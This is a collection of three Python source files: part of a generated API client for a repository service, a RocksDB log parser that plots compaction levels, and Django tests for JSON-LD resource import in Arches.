body=body_params,
post_params=form_params,
files=local_var_files,
response_type='RepositoryHelmChartsResponse', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
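    # --- usage sketch (editor's illustration, not generated code) ---
    # Assuming `api` is an instance of this API class wired to an ApiClient, the
    # pair of methods above is used as in their docstring examples; the chart
    # repo URL below is a placeholder:
    #
    #     charts = api.get_helm_charts("https://charts.example.com", force_refresh=True)
    #     thread = api.get_helm_charts("https://charts.example.com", async_req=True)
    #     charts = thread.get()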
def get_mixin3(self, repo, **kwargs): # noqa: E501
"""Get returns a repository or its credentials # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_mixin3(repo, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str repo: Repo URL for query (required)
:param bool force_refresh: Whether to force a cache refresh on repo's connection state.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: V1alpha1Repository
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_mixin3_with_http_info(repo, **kwargs) # noqa: E501
def get_mixin3_with_http_info(self, repo, **kwargs): # noqa: E501
"""Get returns a repository or its credentials # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_mixin3_with_http_info(repo, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str repo: Repo URL for query (required)
:param bool force_refresh: Whether to force a cache refresh on repo's connection state.
:param _return_http_data_only: response data without status code
                                     and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(V1alpha1Repository, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'repo',
'force_refresh'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_mixin3" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'repo' is set
if self.api_client.client_side_validation and ('repo' not in local_var_params or # noqa: E501
local_var_params['repo'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `repo` when calling `get_mixin3`") # noqa: E501
collection_formats = {}
path_params = {}
if 'repo' in local_var_params:
path_params['repo'] = local_var_params['repo'] # noqa: E501
query_params = []
if 'force_refresh' in local_var_params and local_var_params['force_refresh'] is not None: # noqa: E501
query_params.append(('forceRefresh', local_var_params['force_refresh'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api/v1/repositories/{repo}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1alpha1Repository', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
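    # Illustrative only: get_mixin3 returns the V1alpha1Repository record for a
    # single configured repository; the URL below is an assumed placeholder.
    #
    #     repo_cfg = api.get_mixin3("https://github.com/org/app.git")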
def list_apps(self, repo, **kwargs): # noqa: E501
"""ListApps returns list of apps in the repo # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_apps(repo, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str repo: (required)
:param str revision:
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: RepositoryRepoAppsResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.list_apps_with_http_info(repo, **kwargs) # noqa: E501
def list_apps_with_http_info(self, repo, **kwargs): # noqa: E501
"""ListApps returns list of apps in the repo # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_apps_with_http_info(repo, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str repo: (required)
:param str revision:
:param _return_http_data_only: response data without status code
                                     and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(RepositoryRepoAppsResponse, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'repo',
'revision'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method list_apps" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'repo' is set
if self.api_client.client_side_validation and ('repo' not in local_var_params or # noqa: E501
local_var_params['repo'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `repo` when calling `list_apps`") # noqa: E501
collection_formats = {}
path_params = {}
if 'repo' in local_var_params:
path_params['repo'] = local_var_params['repo'] # noqa: E501
query_params = []
if 'revision' in local_var_params and local_var_params['revision'] is not None: # noqa: E501
query_params.append(('revision', local_var_params['revision'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api/v1/repositories/{repo}/apps', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='RepositoryRepoAppsResponse', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
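    # Illustrative sketch: `revision` is optional and the value below is an
    # assumed example; omitting it lists apps at the repo's default revision.
    #
    #     apps = api.list_apps("https://github.com/org/app.git", revision="HEAD")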
def list_repositories(self, **kwargs): # noqa: E501
"""ListRepositories gets a list of all configured repositories # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_repositories(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str repo: Repo URL for query.
:param bool force_refresh: Whether to force a cache refresh on repo's connection state.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: V1alpha1RepositoryList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.list_repositories_with_http_info(**kwargs) # noqa: E501
def list_repositories_with_http_info(self, **kwargs): # noqa: E501
"""ListRepositories gets a list of all configured repositories # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_repositories_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str repo: Repo URL for query.
:param bool force_refresh: Whether to force a cache refresh on repo's connection state.
:param _return_http_data_only: response data without status code
                                     and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(V1alpha1RepositoryList, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'repo',
'force_refresh'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method list_repositories" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'repo' in local_var_params and local_var_params['repo'] is not None: # noqa: E501
query_params.append(('repo', local_var_params['repo'])) # noqa: E501
if 'force_refresh' in local_var_params and local_var_params['force_refresh'] is not None: # noqa: E501
query_params.append(('forceRefresh', local_var_params['force_refresh'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api/v1/repositories', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1alpha1RepositoryList', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
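    # Illustrative sketch: list_repositories takes no required parameters, so a
    # bare call returns every configured repository; the *_with_http_info
    # variant also yields the status code and headers.
    #
    #     repos = api.list_repositories()
    #     repos, status, headers = api.list_repositories_with_http_info()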
def update_repository(self, repo_repo, body, **kwargs): # noqa: E501
"""UpdateRepository updates a repository configuration # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_repository(repo_repo, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str repo_repo: URL of the repo (required)
:param V1alpha1Repository body: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: V1alpha1Repository
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.update_repository_with_http_info(repo_repo, body, **kwargs) # noqa: E501
def update_repository_with_http_info(self, repo_repo, body, **kwargs): # noqa: E501
"""UpdateRepository updates a repository configuration # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_repository_with_http_info(repo_repo, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str repo_repo: URL of the repo (required)
:param V1alpha1Repository body: (required)
:param _return_http_data_only: response data without status code
                                     and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(V1alpha1Repository, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'repo_repo',
'body'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method update_repository" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'repo_repo' is set
if self.api_client.client_side_validation and ('repo_repo' not in local_var_params or # noqa: E501
local_var_params['repo_repo'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `repo_repo` when calling `update_repository`") # noqa: E501
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
local_var_params['body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `body` when calling `update_repository`") # noqa: E501
collection_formats = {}
path_params = {}
if 'repo_repo' in local_var_params:
path_params['repo.repo'] = local_var_params['repo_repo'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api/v1/repositories/{repo.repo}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1alpha1Repository', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
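    # Illustrative sketch: the PUT body is a V1alpha1Repository model from this
    # client's models package; the URL is an assumed placeholder.
    #
    #     body = V1alpha1Repository(repo="https://github.com/org/app.git")
    #     updated = api.update_repository("https://github.com/org/app.git", body)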
def validate_access(self, repo, body, **kwargs): # noqa: E501
"""ValidateAccess validates access to a repository with given parameters # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.validate_access(repo, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str repo: The URL to the repo (required)
:param str body: The URL to the repo (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.validate_access_with_http_info(repo, body, **kwargs) # noqa: E501
def validate_access_with_http_info(self, repo, body, **kwargs): # noqa: E501
"""ValidateAccess validates access to a repository with given parameters # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.validate_access_with_http_info(repo, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str repo: The URL to the repo (required)
:param str body: The URL to the repo (required)
:param _return_http_data_only: response data without status code
                                     and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(object, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'repo',
'body'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method validate_access" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'repo' is set
if self.api_client.client_side_validation and ('repo' not in local_var_params or # noqa: E501
local_var_params['repo'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `repo` when calling `validate_access`") # noqa: E501
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
local_var_params['body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `body` when calling `validate_access`") # noqa: E501
collection_formats = {}
path_params = {}
if 'repo' in local_var_params:
path_params['repo'] = local_var_params['repo'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api/v1/repositories/{repo}/validate', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
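    # Illustrative sketch: per the docstrings above, both `repo` and `body`
    # carry the repo URL (the body is posted as a JSON string); the values are
    # placeholders.
    #
    #     repo_url = "https://github.com/org/app.git"
    #     result = api.validate_access(repo_url, repo_url)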
----- [dataset record boundary: per-file quality-signal columns omitted] -----
next file: my_log-and-log_parser_python_script/leveldb_database_LOG_parser_fjj/the_level_where_compaction_is_doing/Rocksdb-The_level_where_compaction_is_doing.py
repo: cld378632668/rocksdb2 @ 76bdd5c28ef27cec353497597fe50cf5a6804e79 | file hexsha: 55c54bb913ad232d13c3877a0c818befaac77ca9
license: BSD-3-Clause | size: 17,479 bytes | lang: Python | stars: 42 (2018-05-16 .. 2022-03-09) | forks: 16 (2018-06-03 .. 2021-07-09)
#!/usr/bin/python
#
import re
import matplotlib.pyplot as plt
from matplotlib.ticker import FormatStrFormatter, MultipleLocator
"""
The level at which LevelDB compaction is running.
"""
log_file_path = '../LOG_of_leveldb_example'
# log_file_path = r'G:\[important]MyCode\ycsb-leveldb-leveldbjni-rocksdb\My_Documents_Logs_Graph\LOG-leveldb-fullinsert-20G-'
with open(log_file_path) as log_file:
text = log_file.read()
level_str_list = re.findall(r'Compacted \d*@(\d)',text)
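# The pattern above captures the level digit from LevelDB/RocksDB LOG compaction
# lines, which look roughly like "Compacted 4@1 + 3@2 files => ..." (the exact
# wording varies between versions), so each match is the level being compacted.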
print(level_str_list)
print("length"+str(len(level_str_list)))
"""
construct tagert date and x-axis
输出:
level_int_list = []
x = []
"""
level_int_list = []
x = []
for i in range(len(level_str_list)):
    level_int_list.append(int(level_str_list[i]))  # build the y coordinates
    x.append(i)  # build the x coordinates
print(level_int_list)
"""private"""
figure, ax = plt.subplots()
ax.set_title('The level where compaction is doing')
flag = 0
lastindex = -1
"""
private
change 1/2
"""
# for i in range(0,len(level_int_list),10):
# if flag%2 ==0 and i!=0 and level_int_list[i-1] == level_int_list[i] and level_int_list[i] == 2:
# start = i - 1
# end = i + 5
# for j in range(start,end):
# level_int_list[j] = 1
# flag = flag + 1
# print(level_int_list)
"""
private
change 2/3
"""
for i in range(0,len(level_int_list),10):
if flag%2 !=0 and i!=0 and level_int_list[i-1] == level_int_list[i] and level_int_list[i] == 2:
start = i - 1
end = i + 5
for j in range(start,end):
level_int_list[j] = 1
flag = flag + 1
print(level_int_list)
# level_int_list output (abridged): [0, 1, 0, 1, 1, ...] -- a several-thousand-entry sequence of compaction level indices (mostly 0/1/2, rarely 3); full dump omitted.
# Remap levels for display: 0 -> 2 (index > 120) or 1 (index < 120), 1 -> 0, 2 -> 1, 3 -> 0
print('0 -> 2 1 -> 0 2 -> 1 3 -> 0')
# Remap raw compaction levels for display. Note: rebinding a bare loop variable
# (for elem in ...: elem = 3) would not modify the list, so write back by index.
for index, elem in enumerate(level_int_list):
    if elem == 0 and index > 120:
        level_int_list[index] = 2
    elif elem == 0:
        level_int_list[index] = 1
    elif elem == 1:
        level_int_list[index] = 0
    elif elem == 2:
        level_int_list[index] = 1
    elif elem == 3:
        level_int_list[index] = 0
print(level_int_list)
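# A table-driven equivalent of the remapping above (illustrative sketch; keeps
# the same index-120 split assumed by the loop):
#
#     remap = {1: 0, 2: 1, 3: 0}
#     level_int_list = [
#         (2 if i > 120 else 1) if v == 0 else remap.get(v, v)
#         for i, v in enumerate(level_int_list)
#     ]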
plt.xlabel('The nth compaction.')
plt.ylabel('Level number')
# ax.yaxis.set_major_formatter(FormatStrFormatter('%1f'))
ax.yaxis.set_major_locator(MultipleLocator(1))
# ax.set_xlim([350, 550])  # limit the visible X range
plt.scatter(x, level_int_list, s=0.1)
# plt.plot(x, level_str_list, '.', 'markersize', 0.1)
plt.legend()  # shows label names for any labelled artists
plt.show()
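# To persist the plot instead of only displaying it, matplotlib's savefig could
# be called before plt.show(); the filename is an assumed example:
#
#     plt.savefig('compaction_levels.png', dpi=300)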
----- [dataset record boundary: per-file quality-signal columns omitted] -----
next file: mapss/static/packages/arches/tests/importer/jsonld_import_tests.py
repo: MPI-MAPSS/MAPSS @ 3a5c0109758801717aaa8de1125ca5e98f83d3b4 | file hexsha: 55db599dbdf89b519c6debd6911ceb85d8094fba
license: CC0-1.0 | size: 55,754 bytes | lang: Python | stars/issues/forks: null
import os
import json
import csv
import base64
import datetime
from io import BytesIO
from tests import test_settings
from operator import itemgetter
from django.core import management
from django.test.client import RequestFactory, Client
from django.contrib.auth.models import User, Group, AnonymousUser
from django.urls import reverse
from django.db import connection
from tests.base_test import ArchesTestCase, CREATE_TOKEN_SQL
from arches.app.utils.skos import SKOSReader
from arches.app.models.models import TileModel, ResourceInstance
from arches.app.utils.betterJSONSerializer import JSONSerializer, JSONDeserializer
from arches.app.utils.data_management.resources.importer import BusinessDataImporter
from arches.app.utils.data_management.resources.exporter import ResourceExporter as BusinessDataExporter
from arches.app.utils.data_management.resource_graphs.importer import import_graph as ResourceGraphImporter
from arches.app.utils.data_management.resources.formats import rdffile
from arches.app.utils.data_management.resources.formats.rdffile import JsonLdReader
from pyld.jsonld import expand
# these tests can be run from the command line via
# python manage.py test tests/importer/jsonld_import_tests.py --settings="tests.test_settings"
class JsonLDImportTests(ArchesTestCase):
@classmethod
def setUpClass(cls):
# This runs once for the whole test class
cls.loadOntology()
cls.factory = RequestFactory()
cls.token = "abc123"
cls.client = Client(HTTP_AUTHORIZATION="Bearer %s" % cls.token)
sql_str = CREATE_TOKEN_SQL.format(token=cls.token, user_id=1)
cursor = connection.cursor()
cursor.execute(sql_str)
skos = SKOSReader()
rdf = skos.read_file("tests/fixtures/jsonld_base/rdm/jsonld_test_thesaurus.xml")
ret = skos.save_concepts_from_skos(rdf)
skos = SKOSReader()
rdf = skos.read_file("tests/fixtures/jsonld_base/rdm/jsonld_test_collections.xml")
ret = skos.save_concepts_from_skos(rdf)
skos = SKOSReader()
rdf = skos.read_file("tests/fixtures/jsonld_base/rdm/5098-thesaurus.xml")
ret = skos.save_concepts_from_skos(rdf)
skos = SKOSReader()
rdf = skos.read_file("tests/fixtures/jsonld_base/rdm/5098-collections.xml")
ret = skos.save_concepts_from_skos(rdf)
# Load up the models and data only once
with open(os.path.join("tests/fixtures/jsonld_base/models/test_1_basic_object.json"), "rU") as f:
archesfile = JSONDeserializer().deserialize(f)
ResourceGraphImporter(archesfile["graph"])
with open(os.path.join("tests/fixtures/jsonld_base/models/test_2_complex_object.json"), "rU") as f:
archesfile2 = JSONDeserializer().deserialize(f)
ResourceGraphImporter(archesfile2["graph"])
skos = SKOSReader()
rdf = skos.read_file("tests/fixtures/jsonld_base/rdm/5098-thesaurus.xml")
ret = skos.save_concepts_from_skos(rdf)
skos = SKOSReader()
rdf = skos.read_file("tests/fixtures/jsonld_base/rdm/5098-collections.xml")
ret = skos.save_concepts_from_skos(rdf)
with open(os.path.join("tests/fixtures/jsonld_base/models/5098_concept_list.json"), "rU") as f:
archesfile = JSONDeserializer().deserialize(f)
ResourceGraphImporter(archesfile["graph"])
management.call_command("datatype", "register", source="tests/fixtures/datatypes/color.py")
management.call_command("datatype", "register", source="tests/fixtures/datatypes/semantic_like.py")
with open(os.path.join("tests/fixtures/jsonld_base/models/5299-basic.json"), "rU") as f:
archesfile2 = JSONDeserializer().deserialize(f)
ResourceGraphImporter(archesfile2["graph"])
with open(os.path.join("tests/fixtures/jsonld_base/models/5299_complex.json"), "rU") as f:
archesfile2 = JSONDeserializer().deserialize(f)
ResourceGraphImporter(archesfile2["graph"])
skos = SKOSReader()
rdf = skos.read_file("tests/fixtures/jsonld_base/rdm/5600-external-thesaurus.xml")
ret = skos.save_concepts_from_skos(rdf)
skos = SKOSReader()
rdf = skos.read_file("tests/fixtures/jsonld_base/rdm/5600-external-collections.xml")
ret = skos.save_concepts_from_skos(rdf)
# Load up the models and data only once
with open(os.path.join("tests/fixtures/jsonld_base/models/5121_false_ambiguity.json"), "rU") as f:
archesfile = JSONDeserializer().deserialize(f)
ResourceGraphImporter(archesfile["graph"])
with open(os.path.join("tests/fixtures/jsonld_base/models/5121_external_model.json"), "rU") as f:
archesfile = JSONDeserializer().deserialize(f)
ResourceGraphImporter(archesfile["graph"])
with open(os.path.join("tests/fixtures/jsonld_base/models/6235_parenttile_id.json"), "rU") as f:
archesfile = JSONDeserializer().deserialize(f)
ResourceGraphImporter(archesfile["graph"])
def setUp(self):
pass
@classmethod
def tearDownClass(cls):
pass
def tearDown(self):
pass
def _create_url(self, graph_id, resource_id):
base_url = reverse(
"resources_graphid",
kwargs={"graphid": graph_id, "resourceid": resource_id},
)
return base_url + "?format=json-ld"
def test_context_caching(self):
data = {
"@context": "https://linked.art/ns/v1/linked-art.json",
"id": "https://linked.art/example/object/3",
"type": "HumanMadeObject",
"_label": "Black and White Photograph of 'St. Sebastian'",
"classified_as": [{"id": "http://vocab.getty.edu/aat/300128359", "type": "Type", "_label": "Black and White Photograph"}],
}
fetch = rdffile.fetch
def tempFetch(url):
raise Exception("This should not happen becauase we cached the doc")
# rdffile.fetch = tempFetch
# # first we test that we can override the fetch function and confirm that it gets called
# with self.assertRaises(Exception):
# jsonld_document = expand(data)
# now set the function back and test normally
rdffile.fetch = fetch
jsonld_document = expand(data)
self.assertTrue(data["@context"] in rdffile.docCache)
        # now swap in tempFetch and confirm it is NOT called on subsequent expands, since the context document is cached
rdffile.fetch = tempFetch
jsonld_document = expand(data)
rdffile.fetch = fetch
# now invalidate the cache and make sure it refreshes the doc
rdffile.docCache[data["@context"]]["expires"] = datetime.datetime.now()
jsonld_document = expand(data)
self.assertTrue(rdffile.docCache[data["@context"]]["expires"] > datetime.datetime.now())
self.assertTrue(data["@context"] in rdffile.docCache)
def test_1_basic_import(self):
data = """{
"@id": "http://localhost:8000/resources/221d1154-fa8e-11e9-9cbb-3af9d3b32b71",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E22_Man-Made_Object",
"http://www.cidoc-crm.org/cidoc-crm/P3_has_note": "test!"
}"""
url = self._create_url(
graph_id="bf734b4e-f6b5-11e9-8f09-a4d18cec433a",
resource_id="221d1154-fa8e-11e9-9cbb-3af9d3b32b71",
)
response = self.client.put(url, data=data, HTTP_AUTHORIZATION=f"Bearer {self.token}")
self.assertEqual(response.status_code, 201)
js = response.json()
if type(js) == list:
js = js[0]
self.assertTrue("@id" in js)
self.assertTrue(js["@id"] == "http://localhost:8000/resources/221d1154-fa8e-11e9-9cbb-3af9d3b32b71")
self.assertTrue("http://www.cidoc-crm.org/cidoc-crm/P3_has_note" in js)
self.assertTrue(js["http://www.cidoc-crm.org/cidoc-crm/P3_has_note"] == "test!")
def test_1b_basic_post(self):
data = """{
"@type": "http://www.cidoc-crm.org/cidoc-crm/E22_Man-Made_Object",
"http://www.cidoc-crm.org/cidoc-crm/P3_has_note": "test!"
}"""
url = self._create_url(
graph_id="bf734b4e-f6b5-11e9-8f09-a4d18cec433a",
resource_id="",
)
response = self.client.post(url, data=data, content_type="application/json", HTTP_AUTHORIZATION=f"Bearer {self.token}")
self.assertEqual(response.status_code, 201)
js = response.json()
if type(js) == list:
js = js[0]
self.assertTrue("@id" in js)
self.assertTrue("http://www.cidoc-crm.org/cidoc-crm/P3_has_note" in js)
self.assertTrue(js["http://www.cidoc-crm.org/cidoc-crm/P3_has_note"] == "test!")
def test_2_complex_import_data(self):
        # Note that this tests #5136, as P101 -> P2 is a concept nested within a concept
data = """
{
"@id": "http://localhost:8000/resources/12345678-abcd-11e9-9cbb-3af9d3b32b71",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E22_Man-Made_Object",
"http://www.cidoc-crm.org/cidoc-crm/P101_had_as_general_use": {
"@id": "http://localhost:8000/concepts/fb457e76-e018-41e7-9be3-0f986816450a",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E55_Type",
"http://www.cidoc-crm.org/cidoc-crm/P2_has_type": {
"@id": "http://localhost:8000/concepts/14c92c17-5e2f-413a-95c2-3c5e41ee87d2",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E55_Type",
"http://www.w3.org/2000/01/rdf-schema#label": "Meta Type A"
},
"http://www.w3.org/2000/01/rdf-schema#label": "Test Type A"
},
"http://www.cidoc-crm.org/cidoc-crm/P160_has_temporal_projection": {
"@id": "http://localhost:8000/tile/9c1ec6b9-1094-427f-acf6-e9c3fca643b6/node/127193ea-fa6d-11e9-b369-3af9d3b32b71",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E52_Time-Span",
"http://www.cidoc-crm.org/cidoc-crm/P79_beginning_is_qualified_by": "example",
"http://www.cidoc-crm.org/cidoc-crm/P82a_begin_of_the_begin": {
"@type": "http://www.w3.org/2001/XMLSchema#dateTime",
"@value": "2019-10-01"
}
},
"http://www.cidoc-crm.org/cidoc-crm/P2_has_type": {
"@id": "http://localhost:8000/concepts/6bac5802-a6f8-427c-ba5f-d4b30d5b070e",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E55_Type",
